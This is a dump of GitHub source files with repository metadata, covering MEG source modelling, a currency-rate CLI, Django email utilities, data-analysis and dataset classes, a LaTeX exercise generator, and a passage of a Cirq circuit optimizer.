plt.ylabel(\"Precisión [%]\")\n plt.plot(acc3 , label=\"Train Densa\", c='red', alpha=0.6, ls='--')\n plt.plot(val_acc3, label=\"Test Densa\", c='blue', alpha=0.6)\n\n plt.plot(acc[100:] , label=\"Train Conv.\", c='orange', alpha=0.6, ls='--')\n plt.plot(val_acc[100:], label=\"Test Conv.\", c='green', alpha=0.6)\n plt.legend(loc=0)\n plt.savefig(\"../docs/Figs/ejer4_acc.pdf\")\n \n plt.figure(2)\n plt.ylabel(\"Pérdida\")\n plt.plot(loss3 , label=\"Train Conv.\", c='red', alpha=0.6, ls='--')\n plt.plot(val_loss3, label=\"Test Conv.\", c='blue', alpha=1)\n\n plt.plot(loss , label=\"Train Conv.\", c='orange', alpha=0.6, ls='--')\n plt.plot(val_loss, label=\"Test Conv.\", c='green', alpha=0.6)\n plt.legend(loc=0)\n plt.savefig(\"../docs/Figs/ejer4_loss.pdf\")\n\n plt.show()\nif __name__ == '__main__':\n ejer4()\n #plot_output()","repo_name":"astrocronopio/DNN_IB","sub_path":"Practica_4/ejer/ejer4.py","file_name":"ejer4.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"34529317656","text":"from service.serviceImpl import ServiceImpl\nimport argparse\nimport logging\n\nlogging.basicConfig(level=logging.INFO, filename=\"resources/fixerApi.log\")\n\n\ndef main(args):\n log = logging.getLogger()\n service = ServiceImpl()\n if args.command == 'slurp':\n params = (('start_date', args.start_date), ('end_date', args.end_date), ('base', args.base_code.upper()))\n log.info(\"Received {} command with {}\".format(args.command, params))\n response = service.get_timeseries_data(params)\n service.persist_response(response)\n print(\"Data slurped and persisted into the table\")\n elif args.command == 'query':\n base_code = args.base_code.upper()\n currency_code = args.currency_code.upper()\n start_date = args.start_date\n end_date = args.end_date\n params = (('start_date', start_date), ('end_date', end_date ), ('base', base_code),\n ('currency_code', currency_code))\n log.info(\"Received {} command with {}\".format(args.command, params))\n results = service.get_average_rate(base_code, currency_code, start_date, end_date)\n for res in results:\n print(\"Average rate of {} against {} from {} to {} is {}\".format(res[1], res[2], start_date, end_date, res[2]))\n\n elif args.command == 'seed':\n log.info(\"Received {} command\".format(args.command))\n service.seed_database()\n print(\"Successfully seeded the database currencyRates.db\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Historical currency rate slurper\")\n subparsers = parser.add_subparsers(help=\"sub command help\", dest='command')\n parser_slurp = subparsers.add_parser('slurp', help=\"slurp historical data\")\n parser_slurp.add_argument('--base_code', help=\"Base currency code to slurp\",\n required=True, default=\"EUR\")\n parser_slurp.add_argument('--start_date', help=\"Start Date to slurp in YYYY-MM-DD\",\n required=True, default=None)\n parser_slurp.add_argument('--end_date', help=\"End Date to slurp in YYYY-MM-DD\",\n required=True, default=None)\n parser_query = subparsers.add_parser('query', help=\"query historical data\")\n parser_query.add_argument('--base_code', help=\"Base currency code to query\",\n required=True, default=\"EUR\")\n parser_query.add_argument('--currency_code', help=\"Target currency code to query\",\n required=True, default=\"EUR\")\n parser_query.add_argument('--start_date', help=\"Start Date to query in YYYY-MM-DD\",\n required=True, default=None)\n parser_query.add_argument('--end_date', help=\"End Date to query in YYYY-MM-DD\",\n required=True, default=None)\n parser_slurp = subparsers.add_parser('seed', help=\"seed the database with the table\")\n main(parser.parse_args())\n","repo_name":"pascals-ager/fixerApi","sub_path":"fixerApi.py","file_name":"fixerApi.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71165140034","text":"import os\nimport mne\nimport numpy as np\nfrom paths import paths\nimport load\nimport setup\nimport pandas as pd\nimport functions_analysis\nimport mne.beamformer as beamformer\n\n# Load experiment info\nexp_info = setup.exp_info()\n\n# --------- Setup ---------#\nsubjects_mri = ['15909001', '15910001', '15950001', '15911001', '16191001', '16263002']\n\nsubjects = ['15909001', '15912001', '15910001', '15950001', '15911001', '11535009', '16191001', '16200001',\n '16201001', '10925091', '16263002', '16269001']\n\n# subjects = ['15910001', '15950001', '15911001', '16191001', '16263002']\n\n# Define surface or volume source space\nsurf_vol = 'surface'\nuse_ica_data = True\nforce_fsaverage = False\nico = 4\nspacing = 10.\npick_ori = None\n\n# Define Subjects_dir as Freesurfer output folder\nmri_path = paths().mri_path()\nsubjects_dir = os.path.join(mri_path, 'FreeSurfer_out')\nos.environ[\"SUBJECTS_DIR\"] = subjects_dir\n\n# Digitalization data path\ndig_path = paths().opt_path()\n\n# --------- Coregistration ---------#\n# Iterate over subjects\nfor subject_code in subjects:\n\n if use_ica_data:\n # Load subject and meg clean data\n subject = load.ica_subject(exp_info=exp_info, subject_code=subject_code)\n meg_data = subject.load_ica_meg_data()\n data_type = 'ICA'\n else:\n subject = load.preproc_subject(exp_info=exp_info, subject_code=subject_code)\n meg_data_orig = subject.load_preproc_meg_data()\n data_type = 'RAW'\n\n if force_fsaverage:\n subject_code = 'fsaverage'\n # Check mean distances if already run transformation\n trans_path = os.path.join(subjects_dir, subject_code, 'bem', f'{subject_code}-trans.fif')\n trans = mne.read_trans(trans_path)\n print('Distance from head origin to MEG origin: %0.1f mm'\n % (1000 * np.linalg.norm(meg_data.info['dev_head_t']['trans'][:3, 3])))\n print('Distance from head origin to MRI origin: %0.1f mm'\n % (1000 * np.linalg.norm(trans['trans'][:3, 3])))\n\n else:\n # Check if subject has MRI data\n try:\n fs_subj_path = os.path.join(subjects_dir, subject.subject_id)\n os.listdir(fs_subj_path)\n try:\n # Check mean distances if already run transformation\n trans_path = os.path.join(subjects_dir, subject_code, 'bem', f'{subject_code}-trans.fif')\n trans = mne.read_trans(trans_path)\n print('Distance from head origin to MEG origin: %0.1f mm'\n % (1000 * np.linalg.norm(meg_data.info['dev_head_t']['trans'][:3, 3])))\n print('Distance from head origin to MRI origin: %0.1f mm'\n % (1000 * np.linalg.norm(trans['trans'][:3, 3])))\n\n except:\n # Load digitalization file\n dig_path_subject = dig_path + subject.subject_id\n dig_filepath = dig_path_subject + '/Model_Mesh_5m_headers.pos'\n pos = pd.read_table(dig_filepath, index_col=0)\n\n # Get fiducials from dig\n nasion = pos.loc[pos.index == 'nasion ']\n lpa = pos.loc[pos.index == 'left ']\n rpa = pos.loc[pos.index == 'right ']\n\n # Get head points\n pos.drop(['nasion ', 'left ', 'right '], inplace=True)\n pos_array = pos.to_numpy()\n\n # Make montage\n dig_montage = mne.channels.make_dig_montage(nasion=nasion.values.ravel(), lpa=lpa.values.ravel(),\n rpa=rpa.values.ravel(), hsp=pos_array, coord_frame='unknown')\n\n # Make info object\n dig_info = meg_data.pick('meg').info.copy()\n dig_info.set_montage(montage=dig_montage)\n\n # Save raw instance with info\n info_raw = mne.io.RawArray(np.zeros((dig_info['nchan'], 1)), dig_info)\n dig_info_path = dig_path_subject + '/info_raw.fif'\n info_raw.save(dig_info_path, overwrite=True)\n\n # Align and save fiducials and transformation 
files to FreeSurfer/subject/bem folder\n mne.gui.coregistration(subject=subject.subject_id, subjects_dir=subjects_dir, inst=dig_info_path, block=True)\n\n # If subject has no MRI data\n except:\n subject_code = 'fsaverage'\n # Check mean distances if already run transformation\n trans_path = os.path.join(subjects_dir, subject_code, 'bem', f'{subject_code}-trans.fif')\n trans = mne.read_trans(trans_path)\n print('Distance from head origin to MEG origin: %0.1f mm'\n % (1000 * np.linalg.norm(meg_data.info['dev_head_t']['trans'][:3, 3])))\n print('Distance from head origin to MRI origin: %0.1f mm'\n % (1000 * np.linalg.norm(trans['trans'][:3, 3])))\n\n # --------- Bem model ---------#\n # Source data and models path\n sources_path = paths().sources_path()\n sources_path_subject = sources_path + subject.subject_id\n sources_path_fsaverage = sources_path + 'fsaverage'\n os.makedirs(sources_path_subject, exist_ok=True)\n os.makedirs(sources_path_fsaverage, exist_ok=True)\n\n fname_bem = sources_path + subject_code + f'/{subject_code}_bem_ico{ico}-sol.fif'\n try:\n # Load\n bem = mne.read_bem_solution(fname_bem)\n except:\n # Compute\n model = mne.make_bem_model(subject=subject_code, ico=ico, conductivity=[0.3], subjects_dir=subjects_dir)\n bem = mne.make_bem_solution(model)\n # Save\n mne.write_bem_solution(fname_bem, bem, overwrite=True)\n\n # --------- Background noise covariance ---------#\n noise_cov = functions_analysis.noise_cov(exp_info=exp_info, subject=subject, bads=meg_data.info['bads'], use_ica_data=use_ica_data)\n\n # # Extra\n # # Change head loc\n # head_loc_idx = 1\n # meg_data.info['dev_head_t'] = raws_list[head_loc_idx].info['dev_head_t']\n\n # --------- Raw data covariance ---------#\n # Pick meg channels for source modeling\n meg_data.pick('meg')\n\n # Compute covariance to withdraw from meg data\n data_cov = mne.compute_raw_covariance(meg_data, reject=dict(mag=4e-12), rank=None)\n\n # --------- Source space, forward model and inverse operator ---------#\n if surf_vol == 'volume':\n # Volume\n # Source model\n fname_src = sources_path + subject_code + f'/{subject_code}_volume_ico{ico}_{int(spacing)}-src.fif'\n try:\n # Load\n src = mne.read_source_spaces(fname_src)\n except:\n # Compute\n src = mne.setup_volume_source_space(subject=subject_code, subjects_dir=subjects_dir, bem=bem, pos=spacing,\n sphere_units='m', add_interpolator=True)\n # Save\n mne.write_source_spaces(fname_src, src, overwrite=True)\n\n # Forward model\n fwd = mne.make_forward_solution(meg_data.info, trans=trans_path, src=src, bem=bem)\n fname_fwd = sources_path_subject + f'/{subject_code}_volume_ico{ico}_{int(spacing)}-fwd.fif'\n mne.write_forward_solution(fname_fwd, fwd, overwrite=True)\n\n # Spatial filter\n rank = sum([ch_type == 'mag' for ch_type in meg_data.get_channel_types()]) - len(meg_data.info['bads'])\n if use_ica_data:\n rank -= len(subject.ex_components)\n\n # Define linearly constrained minimum variance spatial filter\n # reg parameter is for regularization on rank deficient matrices (rank < channels)\n filters = beamformer.make_lcmv(info=meg_data.info, forward=fwd, data_cov=data_cov, reg=0.05,\n noise_cov=noise_cov, pick_ori=pick_ori, rank=dict(mag=rank))\n\n # Save\n fname_lmcv = sources_path_subject + f'/{subject_code}_volume_ico{ico}_{int(spacing)}_{pick_ori}-lcmv.fif'\n filters.save(fname=fname_lmcv, overwrite=True)\n\n elif surf_vol == 'surface':\n # Surface\n # Source model\n fname_src = sources_path_subject + f'/{subject_code}_surface_ico{ico}-src.fif'\n try:\n # Load\n src = 
mne.read_source_spaces(fname_src)\n except:\n # Compute\n src = mne.setup_source_space(subject=subject_code, spacing=f'ico{ico}', subjects_dir=subjects_dir)\n # Save\n mne.write_source_spaces(fname_src, src, overwrite=True)\n\n # Forward model\n fwd = mne.make_forward_solution(meg_data.info, trans=trans_path, src=src, bem=bem)\n fname_fwd = sources_path_subject + f'/{subject_code}_surface_ico{ico}-fwd.fif'\n mne.write_forward_solution(fname_fwd, fwd, overwrite=True)\n\n # Spatial filter\n rank = sum([ch_type == 'mag' for ch_type in meg_data.get_channel_types()]) - len(meg_data.info['bads'])\n if use_ica_data:\n rank -= len(subject.ex_components)\n\n # Define linearly constrained minimum variance spatial filter\n # reg parameter is for regularization on rank deficient matrices (rank < channels)\n filters = beamformer.make_lcmv(info=meg_data.info, forward=fwd, data_cov=data_cov, reg=0.05,\n noise_cov=noise_cov, pick_ori=pick_ori, rank=dict(mag=rank))\n\n # Save\n fname_lmcv = sources_path_subject + f'/{subject_code}_surface_ico{ico}_{pick_ori}-lcmv.fif'\n filters.save(fname=fname_lmcv, overwrite=True)\n\n elif surf_vol == 'mixed':\n fname_src_mix = sources_path_subject + f'/{subject_code}_mixed_ico{ico}_{int(spacing)}-src.fif'\n try:\n # Load\n src_surf = mne.read_source_spaces(fname_src_surf)\n except:\n # Mixed\n # Surface source model\n fname_src_surf = sources_path_subject + f'/{subject_code}_surface_ico{ico}-src.fif'\n try:\n # Load\n src_surf = mne.read_source_spaces(fname_src_surf)\n except:\n # Compute\n src_surf = mne.setup_source_space(subject=subject_code, spacing=f'ico{ico}', subjects_dir=subjects_dir)\n # Save\n mne.write_source_spaces(fname_src_surf, src_surf, overwrite=True)\n\n # Volume source model\n fname_src_vol = sources_path + subject_code + f'/{subject_code}_volume_ico{ico}_{int(spacing)}-src.fif'\n try:\n # Load\n src_vol = mne.read_source_spaces(fname_src_vol)\n except:\n # Compute\n src_vol = mne.setup_volume_source_space(subject=subject_code, subjects_dir=subjects_dir, bem=bem,\n pos=spacing, sphere_units='m', add_interpolator=True)\n # Save\n mne.write_source_spaces(fname_src_vol, src_vol, overwrite=True)\n\n # Mixed source space\n src = src_surf + src_vol\n # Save\n mne.write_source_spaces(fname_src_mix, src, overwrite=True)\n\n # Forward model\n fwd = mne.make_forward_solution(meg_data.info, trans=trans_path, src=src, bem=bem)\n fname_fwd = sources_path_subject + f'/{subject_code}_mixed_ico{ico}_{int(spacing)}-fwd.fif'\n mne.write_forward_solution(fname_fwd, fwd, overwrite=True)\n\n # Spatial filter\n rank = sum([ch_type == 'mag' for ch_type in meg_data.get_channel_types()]) - len(meg_data.info['bads'])\n if use_ica_data:\n rank -= len(subject.ex_components)\n\n # Define linearly constrained minimum variance spatial filter\n # reg parameter is for regularization on rank deficient matrices (rank < channels)\n filters = beamformer.make_lcmv(info=meg_data.info, forward=fwd, data_cov=data_cov, reg=0.05,\n noise_cov=noise_cov, pick_ori=pick_ori, rank=dict(mag=rank))\n\n # Save\n fname_lmcv = sources_path_subject + f'/{subject_code}_mixed_ico{ico}_{int(spacing)}_{pick_ori}-lcmv.fif'\n filters.save(fname=fname_lmcv, overwrite=True)\n","repo_name":"jegonza66/MEGEYEHS","sub_path":"coreg-headmodel_setup.py","file_name":"coreg-headmodel_setup.py","file_ext":"py","file_size_in_byte":12028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11685052181","text":"import numpy as np\nimport torch\nimport random\nimport cv2\nfrom config import system_configs\n# from torch_geometric.data import Data,DataLoader\ndef kp_track(db, k_ind, data_aug=True, debug=False):\n batch_size = system_configs.batch_size\n images = []\n positions = np.zeros((batch_size,5,4), dtype=np.float32)\n last_positions= np.zeros((batch_size,2), dtype=np.float32)\n space = np.zeros((batch_size,6,16), dtype=np.float32)\n data_list = []\n labels = np.zeros((batch_size, ), dtype=np.float32)\n db_size = len(db.db_inds)\n\n for b_ind in range(batch_size):\n if k_ind==0:\n db.shuffle_inds()\n db_ind = db.db_inds[k_ind]\n k_ind = (k_ind + 1) % db_size\n\n pimg,labels[b_ind] = db.read_data(db_ind)\n pimgs,plist,pgraph = pimg[\"img\"],pimg[\"plist\"],pimg[\"graph\"]\n plist = np.array(plist)\n plist[:-1,0:2] += np.random.rand(6,2)*2-1\n # plist[:-1,2:4] += np.random.rand(6,2)*1-0.5\n plist[:-1,2:4] += plist[:-1,0:2]\n # temp_c = plist[:-2,-2:]-plist[1:-1,-2:]\n # temp_wh = plist[:-2,2:4]-plist[1:-1,2:4]\n # positions[b_ind]=np.hstack([temp_c,temp_wh])\n positions[b_ind]=plist[:-2,0:4]-plist[1:-1,0:4]\n last_positions[b_ind]=plist[-3,-2:]-plist[-1,-2:]\n temp_graph = []\n for i,g in enumerate(pgraph):\n # temp_c = g[:,-2:]\n temp_c = g[1:,-2:]-g[0,-2:]\n temp_wh = g[1:,2:4]\n temp = np.hstack([temp_c,temp_wh]).reshape(-1) + np.random.rand(16)*2-1\n space[b_ind,i]= temp\n # space[b_ind,i]= temp/10\n rate = 10\n positions = torch.from_numpy(positions/rate)\n last_positions = torch.from_numpy(last_positions/rate)\n labels = torch.from_numpy(labels)\n space = torch.clamp(torch.from_numpy(space),min=-20,max=20)/rate\n\n return {\n \"xs\": [images,positions,space],\n \"ys\": [labels,last_positions]\n },k_ind\n\ndef sample_data(db, k_ind, data_aug=True, debug=False):\n return globals()[system_configs.sampling_function](db, k_ind, data_aug, debug)","repo_name":"jiefeng0109/CKDNet-SMTNet","sub_path":"SMTNet/sample/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"11916505216","text":"from datetime import datetime\nfrom os.path import splitext\n\nfrom django.template.loader import render_to_string\nfrom django.core.signing import Signer\n\nfrom bboard.settings import ALLOWED_HOSTS\n\n\nsigner = Signer() # creating unique user's signe\n\n\ndef send_activation_notification(user):\n \"\"\"Form and send letter for user's activation\"\"\"\n\n if ALLOWED_HOSTS: # finding site's host\n host = 'http://' + ALLOWED_HOSTS[0]\n else:\n host = 'http://localhost:8000'\n\n context = {'user': user, 'host': host, 'sign': signer.sign(user.username)}\n subject = render_to_string('email/activation_letter_subject.txt', context)\n body_text = render_to_string('email/activation_letter_body.txt', context)\n user.email_user(subject, body_text)\n\n\ndef send_new_comment_notification(comment):\n \"\"\"\n Form and send letter to ad's author,\n if somebody left comment for author's ad.\n :param comment:\n :return:\n \"\"\"\n if ALLOWED_HOSTS:\n host = 'http://' + ALLOWED_HOSTS[0]\n else:\n host = 'http://localhost:8000'\n\n author = comment.bb.author\n context = {'author': author, 'host': host, 'comment': comment}\n subject = render_to_string('email/new_comment_letter_subject.txt', context)\n body_text = render_to_string('email/new_comment_letter_body.txt', context)\n author.email_user(subject, body_text)\n\n\ndef get_timestamp_path(instance, filename):\n \"\"\"Generate name for loaded and saved file in model\"\"\"\n return '%s%s' % (datetime.now().timestamp(), splitext(filename)[1])\n","repo_name":"MaxGonchar/django_cheat_sheet_project","sub_path":"main/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73465647555","text":"import json\nimport typing as tp\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom datetime import datetime\nfrom matplotlib.figure import Figure\n\nimport os\nimport sys\n\nf = open(os.devnull, 'w')\nsys.stderr = f\n\n\nclass YouTube2:\n df: pd.DataFrame\n p_table: pd.DataFrame.pivot_table\n p_table_pro: pd.DataFrame.pivot_table\n\n def __init__( # task0\n self,\n trends_df_path: str = 'RUvideos_short.csv',\n categories_df_path: str = 'RU_category_id.json'\n ):\n self.trends_df = pd.read_csv(\n trends_df_path, parse_dates=['trending_date'],\n date_parser=(\n lambda x: pd.to_datetime(x, format='%y.%d.%m')\n )\n )\n\n with open(categories_df_path) as json_file:\n json_data = json.load(json_file)\n\n self.categories_df = pd.DataFrame(columns=['id', 'name'])\n\n for item in json_data['items']:\n self.categories_df = self.categories_df.append(\n {'id': int(item['id']),\n 'name': item['snippet']['title']},\n ignore_index=True\n )\n\n self.categories_df['id'] = self.categories_df['id'].astype(int)\n\n def task1(self) -> pd.DataFrame:\n self.df = self.trends_df.merge(self.categories_df, left_on='category_id', right_on='id')\n return self.df\n\n def task2(self) -> pd.DataFrame:\n self.p_table = pd.pivot_table(self.df, index='name', columns='trending_date', values='views', aggfunc=np.sum)\n return self.p_table\n\n def task3(self) -> Figure:\n sns.heatmap(self.p_table.apply(lambda x: x / 1e6), annot=True)\n plt.title('heatmap')\n return plt.gcf()\n\n def task4(self) -> pd.DataFrame:\n self.df.trending_date = self.df.trending_date.dt.day\n self.p_table_pro = pd.pivot_table(self.df, index='name', columns='trending_date', values='views',\n margins=True, margins_name='Всего', aggfunc=np.sum)\n return self.p_table_pro\n\n def task5(self): # -> Figure:\n mask = np.zeros((16, 9))\n mask[:, 8] = True\n mask[15, :] = True\n mask2 = np.zeros((16, 9))\n mask2[15, 8] = True\n self.p_table_pro = self.p_table_pro.apply(lambda x: x / 1e6)\n sns.heatmap(self.p_table_pro, alpha=0, cbar=False, annot=True, annot_kws={'color': 'black'},\n mask=mask2, fmt='.1f')\n sns.heatmap(self.p_table_pro, vmax=5, mask=mask, annot=True, fmt='.1f',\n cbar_kws={'label': 'Количество просмотров (млн)'})\n\n plt.title('Тепловая карта просмотров')\n plt.ylabel('Категория видео')\n plt.xlabel('Число (ноябрь 2017)')\n # return plt.gcf()\n","repo_name":"hxzwww/data_analysis","sub_path":"n2/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27636077112","text":"# -*- encoding: utf-8 -*-\n\"\"\"\nUsage::\n\n hammer sync-plan [OPTIONS] SUBCOMMAND [ARG] ...\n\nParameters::\n\n SUBCOMMAND subcommand\n [ARG] ... subcommand arguments\n\nSubcommands::\n\n create Create a sync plan\n delete Destroy a sync plan\n info Show a sync plan\n list List sync plans\n update\n\"\"\"\n\nfrom robottelo.cli.base import Base\n\n\nclass SyncPlan(Base):\n \"\"\"\n Manipulates Katello engine's sync-plan command.\n \"\"\"\n\n command_base = 'sync-plan'\n command_requires_org = True\n\n @classmethod\n def create(cls, options=None):\n cls.command_requires_org = False\n\n try:\n result = super(SyncPlan, cls).create(options)\n finally:\n cls.command_requires_org = True\n\n return result\n\n @classmethod\n def info(cls, options=None):\n cls.command_requires_org = False\n\n try:\n result = super(SyncPlan, cls).info(options)\n finally:\n cls.command_requires_org = True\n\n return result\n","repo_name":"san7ket/robottelo","sub_path":"robottelo/cli/syncplan.py","file_name":"syncplan.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"36998054525","text":"class Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n # 动态规划\n # 1. 分治问题: 第i个元素为结尾的的最大连续子数组的和, max_sub(i) = Max(max_sub(i - 1), 0) + nums[i])\n # 2. 定义状态数组: dp[i] 表示第i个元素为结尾的的最大连续子数组的和\n # 3. ���义状态方程: dp[i] = Max(dp[i - 1], 0) + nums[i]\n\n dp = nums\n for i in range(1, len(dp)):\n dp[i] = max(dp[i - 1], 0) + nums[i]\n \n return max(dp)","repo_name":"algorithm006-class02/algorithm006-class02","sub_path":"Week_05/G20200343030632/Leetcode_53_632.py","file_name":"Leetcode_53_632.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"zh","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"}
+{"seq_id":"72920356034","text":"from flask import Flask, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\n\napp = Flask(__name__)\n# app.config('SQLALCHEMY_DATABASE_URI') = environ.get('DATABASE_URL', 'sqlite:///leaflet.sqlite')\n\ndb = SQLAlchemy(app)\nclass Quakes(db.Model):\n __tablename__ = 'quakes'\n\n\n\n@app.route('/')\ndef index(): \n return render_template('index.html')\n\n# @app.route('/api/quakes') \n\nif __name__ == '__main__': \n app.run(debug=True)\n\n","repo_name":"LeeProut/leaflet-heroku","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33953558126","text":"class Solution(object):\n def firstMissingPositive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n smallest = 1\n num_dict = {}\n for num in nums:\n num_dict[num] = 1\n while smallest < 2147483648:\n if smallest not in num_dict:\n return smallest\n smallest += 1\n #return \n \n","repo_name":"gabedonnan/Leetcode-Solutions","sub_path":"smallest-missing-positive.py","file_name":"smallest-missing-positive.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"12201672185","text":"from fairseq import models\nfrom fairseq.dataclass.utils import convert_namespace_to_omegaconf\nfrom fairseq import (\n checkpoint_utils,\n distributed_utils,\n options,\n quantization_utils,\n tasks,\n utils,\n)\n\nimport os\nimport soundfile as sf\nfrom fairseq.data.audio.raw_audio_dataset import * \nimport torch.utils.data as data\nfrom torch.utils.data.sampler import WeightedRandomSampler\nimport librosa\nimport numpy as np\nimport random\n\nclass SpeechCommandsDataset(RawAudioDataset):\n \n #sil=0.1, np=0.5, nl=0.7, sp=0.5, mp=0.5\n def __init__(self, CLASSES, mode='train', root=''):\n super(SpeechCommandsDataset, self).__init__(\n sample_rate=16000,\n pad=False\n ) \n self.CLASSES = CLASSES\n self.mode = mode\n self.root = root\n self.mode_root = os.path.join(root,self.mode)\n self.sample_rate = 16000\n self.data = list()\n self.prep_dataset()\n self.y1 = 0\n self.x1 = 0\n\n if self.mode=='training':\n self.shift_prob = 0.5 \n self.mask_prob = 0.5 \n self.mask_len = 0.1 \n \n \n def prep_dataset(self): \n \n self.id = 0\n for c in self.CLASSES: \n for root, dir, files in os.walk(os.path.join(os.getcwd(),self.mode_root,c)):\n for file in files:\n f_path, cmd = os.path.join(root, file), c \n self.data.append((f_path, cmd, self.id))\n self.id += 1\n #print(f\"{self.mode} data number: {len(self.data)}\")\n \n def __getitem__(self, idx): \n f_path, cmd, id = self.data[idx]\n wav, curr_sample_rate = sf.read(f_path)\n try :\n self.x1, self.y1 = wav.shape\n except:\n self.x1 = wav.shape\n\n if curr_sample_rate!=self.sample_rate: \n wav, curr_sample_rate = librosa.resample(wav, curr_sample_rate, self.sample_rate), self.sample_rate\n \n if self.y1==2:\n wav = librosa.to_mono(wav.transpose(1,0)) \n self.y1 = 0\n wav_len = len(wav)\n if wav_len < self.sample_rate:\n pad_size = self.sample_rate - wav_len\n wav = np.pad(wav, (round(pad_size/2)+1,round(pad_size/2)+1), 'constant', constant_values=0)\n\n wav_len = len(wav)\n mid = int(len(wav)/2)\n cut_off = int(self.sample_rate/2)\n wav = wav[mid-cut_off:mid+cut_off] \n \n\n if self.mode=='training': \n if random.random()1:\n\tif sys.argv[1]==\"test\":\n\t\ttipo = \"test\"\n\t\tnum_esercizi = 0\n\telif sys.argv[1]==\"real\":\n\t\ttipo = \"real\"\n\t\tnum_esercizi = 0\n\telif sys.argv[1]==\"W\":\n\t\ttipo = \"W\"\n\t\tnum_esercizi = 0\n\telse:\n\t\tnum_esercizi = int(sys.argv[1])\nelse:\n\ttipo = \"test\"\t\n\tflag_compila=True\n\nif len(sys.argv)==3:\n\tflag_compila=True\n\nNOME_TEMP = \"template.tex\"\nNOME_OUT = \"esercizio\"\n\n\n\nwith open(NOME_TEMP,\"r\") as t:\n\ttemplate = t.read()\nstringone = compila_documento(tipo)\n\ntemplate = template.replace('ESERCIZI',stringone)\n\nwith open(f'{NOME_OUT}.tex', \"w\") as t_out:\n\tt_out.write(template)\nprint()\nif flag_compila:\n\tsubprocess.run([\"pdflatex\",NOME_OUT],stdout=subprocess.DEVNULL)\n\t#subprocess.run([\"pdflatex\",NOME_OUT])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.aux'])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.log'])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.toc'])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.out'])\n","repo_name":"michelelaig/LinearSystemAutomaticStudy","sub_path":"generatore.py","file_name":"generatore.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"8767585909","text":"from typing import Optional, cast, TYPE_CHECKING, Iterable, Tuple, Dict, List\nimport sympy\n\nfrom cirq import circuits, ops, value, protocols\nfrom cirq.optimizers import decompositions\n\nif TYPE_CHECKING:\n import cirq\n\n\nclass _OptimizerState:\n def __init__(self):\n # The phases of the W gates currently being pushed along each qubit.\n self.held_w_phases: Dict[ops.Qid, value.TParamVal] = {}\n\n # Accumulated commands to batch-apply to the circuit later.\n self.deletions: List[Tuple[int, ops.Operation]] = []\n self.inline_intos: List[Tuple[int, ops.Operation]] = []\n self.insertions: List[Tuple[int, ops.Operation]] = []\n\n\nclass EjectPhasedPaulis():\n \"\"\"Pushes X, Y, and PhasedX gates towards the end of the circuit.\n\n As the gates get pushed, they may absorb Z gates, cancel against other\n X, Y, or PhasedX gates with exponent=1, get merged into measurements (as\n output bit flips), and cause phase kickback operations across CZs (which can\n then be removed by the EjectZ optimization).\n \"\"\"\n\n def __init__(self,\n tolerance: float = 1e-8,\n eject_parameterized: bool = False) -> None:\n \"\"\"\n Args:\n tolerance: Maximum absolute error tolerance. The optimization is\n permitted to simply drop negligible combinations gates with a\n threshold determined by this tolerance.\n eject_parameterized: If True, the optimization will attempt to eject\n parameterized gates as well. This may result in other gates\n parameterized by symbolic expressions.\n \"\"\"\n self.tolerance = tolerance\n self.eject_parameterized = eject_parameterized\n\n def optimize_circuit(self, circuit: circuits.Circuit):\n state = _OptimizerState()\n\n for moment_index, moment in enumerate(circuit):\n for op in moment.operations:\n affected = [q for q in op.qubits if q in state.held_w_phases]\n\n # Collect, phase, and merge Ws.\n w = _try_get_known_phased_pauli(\n op, no_symbolic=not self.eject_parameterized)\n if w is not None:\n if decompositions.is_negligible_turn(\n w[0] - 1,\n self.tolerance):\n _potential_cross_whole_w(moment_index,\n op,\n self.tolerance,\n state)\n else:\n _potential_cross_partial_w(moment_index, op, state)\n continue\n\n if not affected:\n continue\n\n # Absorb Z rotations.\n t = _try_get_known_z_half_turns(\n op, no_symbolic=not self.eject_parameterized)\n if t is not None:\n _absorb_z_into_w(moment_index, op, state)\n continue\n\n # Dump coherent flips into measurement bit flips.\n if isinstance(op.gate, ops.MeasurementGate):\n _dump_into_measurement(moment_index, op, state)\n\n # Cross CZs using kickback.\n if _try_get_known_cz_half_turns(\n op,\n no_symbolic=not self.eject_parameterized) is not None:\n if len(affected) == 1:\n _single_cross_over_cz(moment_index,\n op,\n affected[0],\n state)\n else:\n _double_cross_over_cz(op, state)\n continue\n\n # Don't know how to handle this situation. 
